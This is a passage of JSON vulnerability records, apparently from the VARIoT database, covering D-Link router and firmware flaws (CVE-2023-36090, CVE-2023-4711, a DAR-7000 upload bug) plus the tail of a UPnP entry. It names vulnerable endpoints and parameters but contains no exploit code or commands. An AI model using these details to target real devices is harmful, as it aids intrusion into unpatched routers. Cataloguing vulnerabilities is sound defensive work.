"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-08T00:00:00",
"db": "CERT/CC",
"id": "VU#339275"
},
{
"date": "2020-06-08T00:00:00",
"db": "VULHUB",
"id": "VHN-165399"
},
{
"date": "2020-06-08T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"date": "2020-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"date": "2021-05-19T14:10:26",
"db": "PACKETSTORM",
"id": "162672"
},
{
"date": "2020-09-15T17:05:32",
"db": "PACKETSTORM",
"id": "159172"
},
{
"date": "2021-02-04T21:34:49",
"db": "PACKETSTORM",
"id": "161288"
},
{
"date": "2021-02-16T23:41:17",
"db": "PACKETSTORM",
"id": "161444"
},
{
"date": "2021-02-12T17:29:06",
"db": "PACKETSTORM",
"id": "161397"
},
{
"date": "2021-04-28T19:12:00",
"db": "PACKETSTORM",
"id": "169049"
},
{
"date": "2020-12-28T20:12:00",
"db": "PACKETSTORM",
"id": "168951"
},
{
"date": "2020-06-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"date": "2020-06-08T17:15:09.973000",
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-08T00:00:00",
"db": "CERT/CC",
"id": "VU#339275"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULHUB",
"id": "VHN-165399"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"date": "2020-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"date": "2024-04-08T22:50:14.587000",
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Universal Plug and Play (UPnP) SUBSCRIBE can be abused to send traffic to arbitrary destinations",
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
}
],
"trust": 0.6
}
}
VAR-202307-2198
Vulnerability from variot - Updated: 2024-06-06 23:11
Authentication Bypass vulnerability in D-Link DIR-885L FW102b01 allows remote attackers to gain escalated privileges via phpcgi. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The firmware of the D-Link Systems, Inc. DIR-885L contains an incorrect authentication vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). D-Link DIR-885L is a wireless router made by China D-Link Company. The vulnerability stems from the lack of effective authentication in phpcgi.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202307-2198",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-885l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02"
},
{
"model": "dir-885l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-885l firmware 1.02"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l fw102b01",
"scope": null,
"trust": 0.6,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-885l_firmware:1.02:b01:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"cve": "CVE-2023-36090",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2023-65168",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-36090",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-36090",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2023-65168",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Authentication Bypass vulnerability in D-Link DIR-885L FW102b01 allows remote attackers to gain escalated privileges via phpcgi. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. D-Link Systems, Inc. of DIR-885L An incorrect authentication vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DIR-885L is a wireless router made by China D-Link Company. The vulnerability stems from the lack of effective authentication in phpcgi",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-36090"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-36090",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2023-65168",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"id": "VAR-202307-2198",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
]
},
"last_update_date": "2024-06-06T23:11:27.436000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DIR-885L Authentication Bypass Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/453471"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "Illegal authentication (CWE-863) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/en/support"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-36090"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"date": "2024-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"date": "2023-07-31T14:15:10.533000",
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"date": "2024-01-18T06:40:00",
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"date": "2024-06-05T21:15:11.203000",
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DIR-885L\u00a0 Fraudulent Authentication Vulnerability in Firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
}
],
"trust": 0.8
}
}
VAR-202309-0018
Vulnerability from variot - Updated: 2024-06-06 22:58
A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to OS command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. An OS command injection vulnerability exists in the firmware of the dar-8000-10 from D-Link Systems, Inc. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0018",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-8000-10",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20230819"
},
{
"model": "dar-8000-10",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dar-8000-10 firmware 20230819 and earlier"
},
{
"model": "dar-8000-10",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dar-8000-10",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20230819",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-8000-10:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"cve": "CVE-2023-4711",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.6,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-4711",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-4711",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2023-4711",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. D-Link Systems, Inc. of dar-8000-10 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "VULMON",
"id": "CVE-2023-4711"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-4711",
"trust": 2.7
},
{
"db": "VULDB",
"id": "238574",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548",
"trust": 0.8
},
{
"db": "VULMON",
"id": "CVE-2023-4711",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"id": "VAR-202309-0018",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5
},
"last_update_date": "2024-06-06T22:58:19.435000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://vuldb.com/?id.238574"
},
{
"trust": 1.9,
"url": "https://github.com/tinkanet/cve/blob/main/rce.md"
},
{
"trust": 1.1,
"url": "https://vuldb.com/?ctiid.238574"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-4711"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"date": "2023-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"date": "2023-09-01T20:15:08.310000",
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"date": "2023-12-13T07:36:00",
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"date": "2024-06-05T21:15:13.273000",
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0dar-8000-10\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
}
],
"trust": 0.8
}
}
VAR-202309-0939
Vulnerability from variot - Updated: 2024-06-06 19:22
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
